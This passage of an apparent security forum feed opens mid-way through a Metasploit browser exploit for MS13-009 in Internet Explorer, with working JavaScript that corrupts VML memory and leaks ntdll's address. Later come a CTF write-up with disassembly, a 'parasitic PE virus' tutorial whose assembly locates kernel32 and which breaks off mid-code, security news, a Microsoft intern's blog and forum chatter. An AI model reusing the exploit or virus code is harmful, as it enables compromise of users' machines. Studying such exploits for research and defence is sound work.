        <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
        <script>
        #{js_trigger}
        </script>
        <body onload="#{create_rects_func}(); #{exploit_func}();">
        <v:oval>
          <v:stroke id="vml1"/>
        </v:oval>
        </body>
        </html>
        |

        return html
      end

      def html_info_leak
        js_trigger = %Q|
        var rect_array = new Array()
        var a = new Array()

        function createRects(){
          for(var i=0; i<0x400; i++){
            rect_array[i] = document.createElement("v:shape")
            rect_array[i].id = "rect" + i.toString()
            document.body.appendChild(rect_array[i])
          }
        }

        function exploit(){
          var vml1 = document.getElementById("vml1")
          for (var i=0; i<0x400; i++){
            a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle;
          }
          for (var i=0; i<0x400; i++){
            a[i].rotation;
            if (i == 0x300) {
              vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44"
            }
          }
          var length_orig = vml1.dashstyle.array.length;
          vml1.dashstyle.array.length = 0 - 1;
          for (var i=0; i<0x400; i++) {
            a[i].marginLeft = "a";
            marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16);
            if (marginLeftAddress > 0) {
              vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300;
              var leak = a[i].marginLeft;
              vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
              vml1.dashstyle.array.length = length_orig;
              document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
              return;
            }
          }
        }
        |

        create_rects_func = "createRects"
        exploit_func = "exploit"

        if datastore['OBFUSCATE']
          js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
          js_trigger.obfuscate
          create_rects_func = js_trigger.sym("createRects")
          exploit_func = js_trigger.sym("exploit")
        end

        html = %Q|
        <html>
        <head>
        <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
        </head>
        <title> </title>
        <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
        <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
        <script>
        #{js_trigger}
        </script>
        <body onload="#{create_rects_func}(); #{exploit_func}();">
        <v:oval>
          <v:stroke id="vml1"/>
        </v:oval>
        </body>
        </html>
        |

        return html
      end

      def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        uri   = request.uri
        print_status("Requesting: #{uri}")

        my_target = get_target(agent)
        # Avoid the attack if no suitable target found
        if my_target.nil?
          print_error("Browser not supported, sending 404: #{agent}")
          send_not_found(cli)
          return
        end

        if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
          html = html_info_leak
          html = html.gsub(/^\t\t/, '')
          print_status("Sending HTML to info leak...")
          send_response(cli, html, {'Content-Type'=>'text/html'})
        else
          leak = begin
            request.uri_parts["QueryString"][@leak_param].to_i
          rescue
            0
          end

          if leak == 0
            html = load_exploit_html(my_target, cli)
            html = html.gsub(/^\t\t/, '')
            print_status("Sending HTML to trigger...")
            send_response(cli, html, {'Content-Type'=>'text/html'})
            return
          end

          vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
          fingerprint = leak & 0x0000ffff
          case fingerprint
          when 0x70B0
            @ntdll_version = "6.1.7601.17514"
            @ntdll_base = leak - 0x470B0
          when 0x7090
            @ntdll_version = "6.1.7601.17725" # MS12-001
            @ntdll_base = leak - 0x47090
          else
            print_error("ntdll version not detected, sending 404: #{agent}")
            send_not_found(cli)
            return
          end

          html = load_exploit_html(my_target, cli)
          html = html.gsub(/^\t\t/, '')
          print_status("Sending HTML to trigger...")
          send_response(cli, html, {'Content-Type'=>'text/html'})
        end
      end
    end

    Source: MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
  11. [h=2]Facebook Reveals Details of US Data Requests[/h]By AFP on June 15, 2013 WASHINGTON - Facebook revealed Friday it received between 9,000 and 10,000 requests for user data from US authorities in the second half of last year, as it seeks to shield itself from a growing scandal. The requests covered issues from child disappearances to petty crimes and terror threats and targeted between 18,000 and 19,000 accounts, the social networking site said, without revealing how often it complied with the requests. Facebook "aggressively" protects its users' data, the company's general counsel Ted Ullyot said in a statement. "We frequently reject such requests outright, or require the government to substantially scale down its requests, or simply give the government much less data than it has requested. And we respond only as required by law," he added. Facebook is fighting an expanding public backlash after a government contractor revealed it was among nine Internet giants that turned over user data to the secret National Security Agency surveillance program PRISM. The companies, which also include Apple, Google, Microsoft and Yahoo, have denied claims the NSA could directly access their servers. US authorities have said the program helped prevent terror attacks. Facebook said it was able to report all US national security-related requests, which no company had previously been allowed to do, after pressing the government to release more details about the program. But, for now, it said the government would only allow Facebook to provide the numbers in aggregate form and as a range. "This is progress, but we're continuing to push for even more transparency, so that our users around the world can understand how infrequently we are asked to provide user data on national security grounds," Ullyot said. 
Google asked the FBI and US Justice Department this week for permission to release numbers related to its handing over of data for the leaked surveillance programs, saying it has "nothing to hide." The company's "transparency report" on government requests does not include national security requests under the Foreign Intelligence Surveillance Act (FISA) that authorized PRISM. In a statement Friday, a Google spokesperson said the company has "always believed it's important to differentiate between different types of government requests," adding that it wants to "publish aggregate numbers of national security requests, including FISA disclosures, separately." Leaker Edward Snowden, who worked as a subcontractor handling computer networks for the NSA, is in Hong Kong, a semi-autonomous Chinese territory, where he has vowed to contest any possible extradition in court. He also revealed the NSA's gathering of a huge trove of telephone metadata. US authorities said they could not mine the logs to target a specific user without authorization from a secret court. Sursa: Facebook Reveals Details of US Data Requests | SecurityWeek.Com
  12. [h=1]Kaspersky Lab discovers "Operation NetTraveler", a global cyber-espionage campaign that targeted government organizations and research institutes[/h] The NetTraveler malware toolkit infected 350 high-profile victims, with the aim of surveillance and data theft.

Bucharest, 5 June 2013 - Kaspersky Lab's team of experts has published a new research report on NetTraveler, a family of malicious programs used in Advanced Persistent Threat (APT) operations to successfully compromise more than 350 high-profile victims in 40 different countries. The NetTraveler group infected victims across numerous organizations, in both the public and private sectors, including government institutions, embassies, oil and gas companies, research centres, military centres and activist organizations. According to the Kaspersky Lab report, this threat has been active since 2004, but the largest volume of activity was recorded between 2010 and 2013. The NetTraveler cyber-espionage group's most recent areas of interest included space exploration, nanotechnology, energy production, nuclear power, laser technology, medicine and communications.

Infection methods: The attackers infected victims' systems by sending spear-phishing e-mails containing Microsoft Office attachments rigged with two heavily exploited vulnerabilities (CVE-2012-0158 and CVE-2010-3333). Although Microsoft has already released patches for these vulnerabilities, they are still widely exploited in targeted attacks and continue to prove effective. The titles of the malicious attachments in the spear-phishing e-mails reveal the NetTraveler group's efforts to tailor its attacks in order to infect high-profile targets.

The titles of the malicious documents include:
Army Cyber Security Policy 2013.doc
Report - Asia Defense Spending Boom.doc
Activity Details.doc
His Holiness the Dalai Lama's visit to Switzerland day 4 Freedom of Speech.doc

Theft and exfiltration of information: During the Kaspersky Lab analysis, the team of experts obtained infection logs from several of the NetTraveler group's command-and-control (C&C) servers. The C&C servers were used to install additional malware on infected machines and to extract the stolen information. Kaspersky Lab's experts estimated the amount of stolen data stored on NetTraveler's C&C servers at more than 22 gigabytes. The data exfiltrated from infected systems included file system listings, keystroke logs and other types of files such as PDFs, Excel spreadsheets and Word documents. In addition, the NetTraveler toolkit could install an additional data-stealing backdoor, which could be customized to steal other types of sensitive information, such as application configuration details or computer-aided design (CAD) files.

Global infection statistics: According to Kaspersky Lab's analysis of the NetTraveler group's C&C servers, there were 350 victims in total in 40 different countries, including the United States, Canada, the United Kingdom, Russia, Chile, Morocco, Greece, Belgium, Austria, Ukraine, Lithuania, Belarus, Australia, Hong Kong, Japan, China, Mongolia, Iran, Turkey, India, Pakistan, South Korea, Thailand, Qatar, Kazakhstan and Jordan. In addition to analysing the C&C data, Kaspersky Lab's experts used the Kaspersky Security Network (KSN) to identify additional infection statistics. The top 10 countries by number of victims detected by KSN were Mongolia, followed by Russia, India, Kazakhstan, Kyrgyzstan, China, Tajikistan, South Korea, Spain and Germany.

Additional findings: During Kaspersky Lab's analysis of NetTraveler, the company's experts identified six victims that had been infected by both NetTraveler and Red October, another cyber-espionage operation analysed by Kaspersky Lab in January 2013. Although no direct link was identified between the NetTraveler attackers and the actors behind the Red October operation, the fact that certain victims were hit by both cyber-espionage campaigns shows that these high-profile victims are targeted by multiple attackers because the information they hold is very valuable.

The full report of Kaspersky Lab's analysis, including indicators of compromise, remediation techniques and details of the NetTraveler operation with all its malicious components, is available on Securelist. Kaspersky Lab products detect and neutralize the malicious programs and all variants used by the NetTraveler toolkit, including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler. Kaspersky Lab products also detect the Microsoft Office exploits used in the spear-phishing attacks, including Exploit.MSWord.CVE-2010-333 and Exploit.Win32.CVE-2012-0158.

# # #

About Kaspersky Lab: Kaspersky Lab is the world's largest privately held vendor of endpoint security solutions and is among the top four vendors of endpoint protection solutions worldwide*. Over its 15 years of existence, Kaspersky Lab has remained an innovator in IT security and provides IT protection suites for consumers, SMBs and large enterprises. The company operates in almost 200 countries and protects more than 300 million users worldwide. For more information, visit www.kaspersky.ro.
Sursa: Kaspersky Lab discovers "Operation NetTraveler", a global cyber-espionage campaign that targeted government organizations and research institutes | kaspersky.ro
  13. "Trash can" and "Most lame posts" are not enough, we need one more category: "Shittiest posts".
  14. [h=1]8 months in Microsoft, I learned these[/h] 07 June 2013, by Ahmet Alp Balkan

Two years ago today, I started at Microsoft Windows Azure as an intern, in the very same team I joined right after college and have been working in for the last 8 months. I decided to summarize a few points I learned so far in this job during the last 8 months. This may sound like the way things work is crappy; it is not. I learned that one will see this sort of problem in all large-scale companies. Most of them are not specific to Microsoft at all. Every company has its own problems. I am not saying that I am unhappy, and I am not complaining. These are purely a few lessons I was not aware of in college (an expectations vs. reality sort of article). Read on:

Expect no documentation in corporations. I have seen that the knowledge inside the company is mostly transferred by talking and hands-on sessions. Some parts of the knowledge base generated are only emailed and not saved anywhere permanent. This is not how information flows in the digital world. There are certain people who, if they got hit by a bus, nobody could pick up their work or code. And it is okay. If this had been my own company, there would be tons of wiki pages.

It is not what you do, it is what you sell. You can spend days making your codebase a better place, writing more robust code and fixing others' mistakes. As long as it does not have a big business impact and you can't ship it, it means practically nothing. Nobody will appreciate you for fixing styling or architectural issues in their code; in fact, they may get offended. That's not something I realized when I was a student.

Not everybody is passionate about engineering. You don't always work with people passionate about creating wonderful software. Mostly, people have other things to do (e.g. family and kids) and writing better code is not a priority for most. And it is okay. I learned not to expect enthusiasm from everybody.

2-3 hours of coding a day is great. Before taking the job, I was able to code 8-10 hours a day on my personal projects. Somehow, in this environment it is almost impossible for me to get 2 hours straight of coding. I spend most of my time trying to figure out how others' uncommented/undocumented code works, debugging strange things and attending daily meetings. Apparently it's not just me, and there can be days when not a single commit is pushed to source control in a team. And it is okay.

Not giving back to the public domain is the norm. I haven't met almost any bloggers or open source developers in my organization dedicating some of their time to give back to the community. Everybody loves finding Stack Overflow answers in search results, but nobody contributes those answers. I can understand that.

The world outside is not well known here. I bet you read about what sort of latest technologies and tools are out on blogs, Reddit or Hacker News every day. It's not common here. I am surprised that no one I met in the Windows Azure team had heard about Heroku or Rackspace, which are direct competitors. That's acceptable; not everybody has to know these.

It is all about getting shit done in corporations. If your manager asks for a button there doing that, nobody cares what sort of mess you created. As long as that functionality is ready, it is okay and can always be fixed later. (I haven't seen that ever happen, yet.) In college, I learned that code quality is as important as the result; it turned out to be wrong.

Copy-pasting code can be okay. If somebody sees you doing this outside corporations, you'll probably get punched in the face. I've seen source files copy-pasted across projects. As long as it gets shit done (described above), no one cares if you produced unmaintainable code.

Code reviews can be skipped, for the sake of agility. It's part of the culture in my team: if you are messing with somebody else's code, you'll send code reviews. Otherwise it is usually not done, and you may wait a long time and, after a lot of pings to draw some attention, maybe somebody will respond.

Latest software, meh. Not everybody is fond of the latest versions here. Almost 90% of my colleagues use older versions of Office, Windows, Visual Studio and the .NET Framework. There is a common belief that newer versions will break existing workflows. This might be the same reason why some enterprises still run all their software on Java 1.3-1.5. So, I learned not to expect the latest software in these environments.

Your specialties usually do not matter. Thousands get hired every year out of college and are usually randomly assigned to a team (which you can't change for 1.5 years). It does not matter whether you have mastered MongoDB, created iOS apps, been an Apache committer, created your own networking library, designed user interfaces or bootstrapped your own startup. You are hired to get something needed done. I was not expecting that. It's hard to find a position in corporations that matches what you love to do.

At the end, you are working for your manager's and their managers' paychecks. I was not aware of this fact in college.

(This post made it to the top of Hacker News and /r/programming. Thanks everyone for the comments and support. There are over 1,000 comments on HN, Reddit and below; I did not have a chance to read them all, sorry if I missed yours.)

Sursa: 8 months in Microsoft, I learned these | /home/alp
  15. It can't be done; whatever we try, the guys are very inventive and would quickly find "bypasses". Besides, there isn't really much swearing; "vulgar" words get used, fuck it, that's ok, but we don't allow personal attacks.
  16. @semaca16: Who are you, man? Which group? Note that the retake exams went up to 50 RON.
  17. A look inside the Facebook servers that will store Europeans' photos, comments and likes

Facebook has switched on its newest data centre, the place through which our Likes, Shares and private information will pass. The centre in Sweden is one of the most impressive in the world. The data centre in Luleå, Sweden went live today, and Facebook representatives said it has the potential to be one of the most efficient and sustainable data centres in the world. The company noted that all the equipment is powered by hydroelectric energy, and there are far fewer backup generators thanks to its energy-reuse capabilities. Facebook chose northern Sweden for this data centre in order to cool the servers where it stores our photos, videos, comments and likes. The excess heat generated by the data centre is used to heat the employees' offices. Placing the servers in Sweden could bring users in Europe better and faster performance. The centre was announced in October 2011 by Facebook's vice-president of operations, Tom Furlong. The Luleå data centre is the first outside the United States of America. Before settling on Sweden, Facebook had to choose between various cold regions of Europe. Luleå is 100 kilometres from the Arctic Circle and is close to a river. Each building has 14 backup generators, which run on diesel.

Photos and video: GALERIE FOTO Incursiune printre serverele Facebook care vor stoca pozele, comentariile și like-urile europenilor | adevarul.ro
  18. [h=3]Vanilla1: write-what-where exploitation (ASLR, Full RELRO, Stack cookie)[/h] Hello, for today's article we're going to analyze and exploit a write-what-where with ASLR, no PIE, full RELRO and a stack cookie. This is part of a set of challenges made by sm0k: Vanilla Dome Wargame. Let's begin.

[h=2]The challenge[/h] Before any reversing attempt, we need to launch the program to see what it does.

vanilla1@VanillaDome ~ $ ls -lash
total 76K
4.0K drwxr-xr-x  2 root          root          4.0K Apr 29 14:15 .
4.0K drwxr-x--x 10 root          root          4.0K May 15 20:52 ..
4.0K -rw-r--r--  1 root          root           127 Mar 23 05:56 .bash_logout
4.0K -rw-r--r--  1 root          root           193 Mar 23 05:56 .bash_profile
4.0K -rw-r--r--  1 root          root          3.9K Apr 29 15:47 .bashrc
 44K -rw-r--r--  1 root          root           44K Apr 29 14:15 .gdbinit
8.0K -r-sr-sr-x  1 vanilla1crack vanilla1crack 6.7K Apr 29 12:28 Vanilla1
4.0K -r--------  1 vanilla1crack vanilla1crack   19 Apr 29 12:28 key
vanilla1@VanillaDome ~ $ ./Vanilla1
	 Usage:./Vanilla1 <file>
vanilla1@VanillaDome ~ $ ./Vanilla1 key
vanilla1@VanillaDome ~ $ python -c 'print "a" * 1024' > /tmp/file.txt
vanilla1@VanillaDome ~ $ ./Vanilla1 /tmp/file.txt

OK, it basically reads some file and does stuff with it...

[h=2]Let's reverse it[/h] Opening GDB and disassembling main we get the following:

Dump of assembler code for function main:
   0x08048578 <+0>:   push   ebp
   0x08048579 <+1>:   mov    ebp,esp
   0x0804857b <+3>:   and    esp,0xfffffff0              ; alignment
   0x0804857e <+6>:   sub    esp,0x1050                  ; there is a HUGE buffer and we have ebp = esp + 0x1050
   0x08048584 <+12>:  mov    eax,DWORD PTR [ebp+0x8]     ; argc
   0x08048587 <+15>:  mov    DWORD PTR [esp+0x1c],eax    ; n_arg = argc
   0x0804858b <+19>:  mov    eax,DWORD PTR [ebp+0xc]     ; argv
   0x0804858e <+22>:  mov    DWORD PTR [esp+0x18],eax    ; args = argv
   0x08048592 <+26>:  mov    eax,gs:0x14                 ; eax = stack cookie
   0x08048598 <+32>:  mov    DWORD PTR [esp+0x104c],eax  ; stack cookie (stored in gs:0x14)
   0x0804859f <+39>:  xor    eax,eax
   0x080485a1 <+41>:  cmp    DWORD PTR [esp+0x1c],0x1    ; if (n_arg <= 1) then error
   0x080485a6 <+46>:  jg     0x80485c4 <main+76>         ; else continue
   0x080485a8 <+48>:  mov    eax,DWORD PTR [esp+0x18]    ; args ptr
   0x080485ac <+52>:  mov    edx,DWORD PTR [eax]         ; program name
   0x080485ae <+54>:  mov    eax,0x8048790               ; format = "\t Usage:%s <file>\n"
                                                         ; printf ("\t Usage:%s <file>\n", argv[0]);
   0x080485b3 <+59>:  mov    DWORD PTR [esp+0x4],edx
   0x080485b7 <+63>:  mov    DWORD PTR [esp],eax
   0x080485ba <+66>:  call   0x8048434 <printf@plt>
   0x080485bf <+71>:  jmp    0x80486a9 <main+305>        ; bye
                                                         ; memset (esp+0x38, 0x0, 0x1000);
   0x080485c4 <+76>:  mov    DWORD PTR [esp+0x34],0x0    ; fp = NULL;
   0x080485cc <+84>:  mov    DWORD PTR [esp+0x8],0x1000
   0x080485d4 <+92>:  mov    DWORD PTR [esp+0x4],0x0
   0x080485dc <+100>: lea    eax,[esp+0x38]
   0x080485e0 <+104>: mov    DWORD PTR [esp],eax
   0x080485e3 <+107>: call   0x80483f4 <memset@plt>
                                                         ; fp = fopen (argv[1], "r");
   0x080485e8 <+112>: mov    edx,0x80487a3               ; "r"
   0x080485ed <+117>: mov    eax,DWORD PTR [esp+0x18]    ; args
   0x080485f1 <+121>: add    eax,0x4
   0x080485f4 <+124>: mov    eax,DWORD PTR [eax]         ; eax = args[1];
   0x080485f6 <+126>: mov    DWORD PTR [esp+0x4],edx
   0x080485fa <+130>: mov    DWORD PTR [esp],eax
   0x080485fd <+133>: call   0x8048424 <fopen@plt>
   0x08048602 <+138>: mov    DWORD PTR [esp+0x34],eax
   0x08048606 <+142>: cmp    DWORD PTR [esp+0x34],0x0    ; if (fp == NULL) then error
   0x0804860b <+147>: je     0x80486a9 <main+305>
   0x08048611 <+153>: jmp    0x8048682 <main+266>        ; else fgets
                                                         ; value1 = atoll (buffer);
   0x08048613 <+155>: lea    eax,[esp+0x1038]            ; this is a small buffer (ebp-0x1050+0x1038 = ebp-0x18)
   0x0804861a <+162>: mov    DWORD PTR [esp],eax
   0x0804861d <+165>: call   0x8048414 <atoll@plt>
   0x08048622 <+170>: mov    DWORD PTR [esp+0x30],eax
                                                         ; fgets (sbuffer, 0x14, fp);
   0x08048626 <+174>: mov    eax,DWORD PTR [esp+0x34]    ; eax = fp
   0x0804862a <+178>: mov    DWORD PTR [esp+0x8],eax
   0x0804862e <+182>: mov    DWORD PTR [esp+0x4],0x14
   0x08048636 <+190>: lea    eax,[esp+0x1038]            ; sbuffer
   0x0804863d <+197>: mov    DWORD PTR [esp],eax
   0x08048640 <+200>: call   0x80483e4 <fgets@plt>
                                                         ; value2 = atoll(sbuffer);
   0x08048645 <+205>: lea    eax,[esp+0x1038]
   0x0804864c <+212>: mov    DWORD PTR [esp],eax
   0x0804864f <+215>: call   0x8048414 <atoll@plt>
   0x08048654 <+220>: mov    DWORD PTR [esp+0x2c],eax
   0x08048658 <+224>: cmp    DWORD PTR [esp+0x30],0x0    ; if (value1 == 0) then fgets
   0x0804865d <+229>: je     0x8048682 <main+266>
   0x0804865f <+231>: cmp    DWORD PTR [esp+0x2c],0x0    ; if (value2 == 0) then fgets
   0x08048664 <+236>: je     0x8048682 <main+266>
                                                         ; insert (value2, value1, esp+0x38);
   0x08048666 <+238>: lea    eax,[esp+0x38]
   0x0804866a <+242>: mov    DWORD PTR [esp+0x8],eax
   0x0804866e <+246>: mov    eax,DWORD PTR [esp+0x30]    ; eax = value1
   0x08048672 <+250>: mov    DWORD PTR [esp+0x4],eax
   0x08048676 <+254>: mov    eax,DWORD PTR [esp+0x2c]    ; eax = value2
   0x0804867a <+258>: mov    DWORD PTR [esp],eax
   0x0804867d <+261>: call   0x8048534 <insert>
                                                         ; fgets (buffer, 0x14, fp);
   0x08048682 <+266>: mov    eax,DWORD PTR [esp+0x34]    ; eax = fp
   0x08048686 <+270>: mov    DWORD PTR [esp+0x8],eax
   0x0804868a <+274>: mov    DWORD PTR [esp+0x4],0x14
   0x08048692 <+282>: lea    eax,[esp+0x1038]            ; buffer
   0x08048699 <+289>: mov    DWORD PTR [esp],eax
   0x0804869c <+292>: call   0x80483e4 <fgets@plt>
   0x080486a1 <+297>: test   eax,eax                     ; if (still data) then loop
   0x080486a3 <+299>: jne    0x8048613 <main+155>
                                                         ; check cookie
   0x080486a9 <+305>: mov    eax,0x0
   0x080486ae <+310>: mov    edx,DWORD PTR [esp+0x104c]  ; stack cookie
   0x080486b5 <+317>: xor    edx,DWORD PTR gs:0x14
   0x080486bc <+324>: je     0x80486c3 <main+331>
   0x080486be <+326>: call   0x8048444 <__stack_chk_fail@plt>
   0x080486c3 <+331>: leave
   0x080486c4 <+332>: ret
End of assembler dump.

Full article: http://binholic.blogspot.ro/2013/06/vanilla1-write-what-where-exploitation.html
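As an added worked example (my own code, not part of the original article), the following C is a reconstruction of the main() above taken from the disassembly and its comments, keeping the same buffer sizes and control flow. The body of insert() is not shown in this excerpt, so it is replaced here by a hypothetical recorder, insert_recorder, that only logs the arguments it receives in the order main() passes them; process_text feeds a constructed string through the loop via a temporary file so the flow can be checked without a real input file. The names process_stream, process_text, call_value1 and call_value2 are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Arguments of one insert() call, in the order main() passes them:
 * insert(value2, value1, big_buffer). */
typedef struct { long value2; long value1; } insert_call;

#define MAX_CALLS 32
static insert_call g_calls[MAX_CALLS];   /* recorded calls (hypothetical helper) */
static int g_ncalls;

/* Stand-in for the real insert(), whose body the excerpt does not show. */
static void insert_recorder(long value2, long value1, char *buf)
{
    (void)buf;
    if (g_ncalls < MAX_CALLS) {
        g_calls[g_ncalls].value2 = value2;
        g_calls[g_ncalls].value1 = value1;
    }
    g_ncalls++;
}

/* main()'s loop as the disassembly shows it: the fgets() at +266 guards the
 * loop, the second fgets() at +200 is not checked, atoll() runs on the
 * 0x14-byte line buffer, and insert() is skipped when either value is 0.
 * The 32-bit build stores atoll()'s result in a 4-byte slot, hence the cast. */
static int process_stream(FILE *fp)
{
    char big[0x1000];          /* esp+0x38, zeroed by memset */
    char line[0x14];           /* esp+0x1038, directly below the cookie */
    int value1, value2;

    memset(big, 0, sizeof big);
    while (fgets(line, sizeof line, fp) != NULL) {   /* +266 */
        value1 = (int)atoll(line);                    /* +155 */
        fgets(line, sizeof line, fp);                 /* +200, return unchecked */
        value2 = (int)atoll(line);                    /* +215 */
        if (value1 == 0 || value2 == 0)               /* +224 / +231 */
            continue;
        insert_recorder(value2, value1, big);         /* +261 */
    }
    return 0;
}

/* Run the loop over constructed text; returns the number of insert() calls. */
int process_text(const char *text)
{
    FILE *fp = tmpfile();
    if (fp == NULL)
        return -1;
    fputs(text, fp);
    rewind(fp);
    g_ncalls = 0;
    process_stream(fp);
    fclose(fp);
    return g_ncalls;
}

long call_value1(int i) { return g_calls[i].value1; }
long call_value2(int i) { return g_calls[i].value2; }

int main(int argc, char **argv)
{
    FILE *fp;
    int i;
    if (argc <= 1) {
        printf("\t Usage:%s <file>\n", argv[0]);
        return 0;
    }
    fp = fopen(argv[1], "r");
    if (fp == NULL)
        return 0;
    process_stream(fp);
    fclose(fp);
    for (i = 0; i < g_ncalls && i < MAX_CALLS; i++)
        printf("insert(%ld, %ld, buf)\n", g_calls[i].value2, g_calls[i].value1);
    return 0;
}
```

Each pair of input lines becomes one (value1, value2) pair, so an input file of "7\n9\n" reaches insert(9, 7, buf) while "0\n5\n" never calls it; note that nothing in main() bounds either value, which is why the write-what-where lives in insert() rather than in this loop.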
  19. [h=1]Six months with Windows 8 (white paper)[/h] By Aryeh Goretsky, posted 6 Jun 2013 at 09:00AM

When Windows 8 first came out, ESET was the first to publish a white paper looking at its security features. In the intervening half-year, we have continued our research, observing how well Windows 8 is doing from a security perspective, as well as how it is being adopted by our customers. As a result of this continuing research, we have released a new paper detailing our observations from the first six months. Here are some of the key findings from the first six months with Windows 8:

About 3.3% of ESET's 100M+ customers have adopted Windows 8 (which is a slightly higher adoption rate than most organizations tracking Windows 8, such as NetApps, have reported, but lower than that of at least one reporter, Valve, which collects data from gamers' PCs).

The replacement of the Start Menu with the Start Screen has generated a whole new ecosystem of Start Menu substitutes. ESET does not treat these programs as malware or PUAs simply because of this functionality, which offers a more traditional interface that many people seem to appreciate. It is important to keep in mind that such programs could contain malware, be bundled with potentially unwanted software, or engage in other behavior that causes them to be classified as a threat, unsafe, unwanted or even a suspicious application.

No malware was identified in the Windows Store, which now has about 60,000 apps. There have been problems with fake apps in the Windows Store, though, as well as ebook piracy. The current nature of the Windows Store may be hampering Windows 8's acceptance in BYOD scenarios because of manageability or legal concerns among corporate customers.

Windows 8's Secure UEFI Boot process appears to be intact, with no signs that malware has bypassed it so far.

Windows RT comes with a somewhat-hidden copy of the Windows Defender app bundled in it. Like its counterpart in Windows 8, Windows Defender provides a base level of security for the operating system. Unlike its counterpart in Windows 8, the Windows RT version cannot be replaced by another solution.

For more information, you can download the white paper directly at Six Months with Windows 8 [PDF, 787KB] or, to see all of ESET's white papers, click on the Papers tab above.

Aryeh Goretsky, MVP, ZCSE, Distinguished Researcher

Sursa: Six months with Windows 8 (white paper) - We Live Security
  20. [h=2]CONFidence 2013 and the x86 quirks[/h]Another week, another conference. Just a few days ago, Gynvael and I had the pleasure to attend and present at the CONFidence 2013 infosec conference traditionally held in Cracow, Poland. The event requires no further introduction – it has been simply the best Polish conference in the security area since it first started, and this year’s edition was up to the usual high standard – we had some great time, meeting old and making new friends as well as enjoying some of the better talks. With regards to our presentation, we originally intended it to be a gathering of references concerning all of the interesting quirks, undocumented behavior and other amusing facts (directly or indirectly related to the CPU architecture) that we heard or learnt about in both 32 and 64-bit x86 processors during the recent years. If you are closely following the CPU hacking and operating system security scene, you are probably aware of most of the material we presented – still, we hope it proves useful as a thorough reference and possibly motivates you to take a deeper look at some of the areas we discussed during the talk. In addition to what was covered on stage, you can also find several extra “further reading” slides containing references to information which did not fit into the elementary slide deck. Download: Beyond MOV ADD XOR – the unusual and unexpected in x86 (PDF, 5.6MB) Sursa: CONFidence 2013 and the x86 quirks | j00ru//vx tech blog
  21. [h=1]BIND 9 patched against remote crash vuln[/h][h=2]Protection against DoS[/h] By Richard Chirgwin, 11th June 2013 Time to get patching, sys admins: ISC (the Internet Systems Consortium) has issued a fix for a BIND 9 denial of service vulnerability. The defect and patch, published last week, “allows an attacker to crash a BIND 9 recursive resolver with a RUNTIME_CHECK error in resolver.c”, the ISC says in its announcement. CVE-2013-3919 says BIND 9.6-ESV-R9, 9.8.5 and 9.9.3 are affected by the bug. While older versions aren't affected, ISC notes that they're also unsupported and could be carrying other unpatched vulnerabilities. “At the time of this advisory no intentional exploitation of this bug has been observed in the wild. However, the existence of the issue has been disclosed on an open mailing list with enough accompanying detail to reverse engineer an attack and ISC is therefore treating this as a Type II (publicly disclosed) vulnerability, in accordance with our Phased Disclosure Process”, the ISC announcement says. Upgraded versions can be downloaded here. ® Sursa: BIND 9 patched against remote crash vuln • The Register
  22. [h=1][Quick tutorial] Finding Kernel32 Base and walking its export table[/h]by SIGSEGV Hey all , I'll just begin as the title says it all. Only Basic PE-format and assembly knowledge are required. The baby steps of any parasitic PE virus should be Finding the Kernel32 Base in the current process address space , then walking its export table to extract the addresses of all the functions it needs. To find the Kernel base , We'll exploit the fact that the Process Environment Block structure of the current process holds a list of the modules , loaded in the process's address space , in their memory loading order , InMemoryOrderModuleList. In Windows NT , The value at offset 0x30 of the FS segment points to the PEB structure : typedef struct _PEB { BOOLEAN InheritedAddressSpace; BOOLEAN ReadImageFileExecOptions; BOOLEAN BeingDebugged; BOOLEAN Spare; HANDLE Mutant; PVOID ImageBaseAddress; PPEB_LDR_DATA LoaderData; // The rest of the structure is irrelevant to us } PEB, *PPEB; So , we follow the LoaderData pointer , which takes us to another structure , PEB_LDR_DATA : typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA; InMemoryOrderModule is a double linked list and it's what we are interested in , each entry in the list points to an LDR_MODULE structure : typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; //..... } LDR_MODULE, *PLDR_MODULE; This structure holds the base address of it's module ,, Now , from Windows 2000 and up to windows 7 , The third module loaded in memory will always be that kernel32.dll. 
Putting it all into code:

[code]
mov ebx, [FS : 0x30]      ; PEB
mov ebx, [ebx + 0x0C]     ; PEB->Ldr
mov ebx, [ebx + 0x14]     ; PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov ebx, [ebx]            ; 2nd Entry
mov ebx, [ebx]            ; 3rd Entry
mov ebx, [ebx + 0x10]     ; Third entry's base address (Kernel32.dll)
mov [ebp+dwKernelBase] , ebx
[/code]

The following example does the following:

1. Find Kernel32.dll base address
2. Parse its export tables to locate GetProcAddress
3. Use it to locate LoadLibraryA
4. Use it to load User32.dll into the current address space
5. Use GetProcAddress to locate MessageBoxA in User32.dll
6. Display a message box
7. Return to host

I'm in the middle of my final exams, so I'm afraid I can't explain the example thoroughly, but anyone with basic PE and assembly knowledge should easily grasp it.

[code]
; By SIGSEGV
[BITS 32]

pushad
call CodeStart
CodeStart:
    pop ebp
    sub ebp,CodeStart                 ; delta offset shit

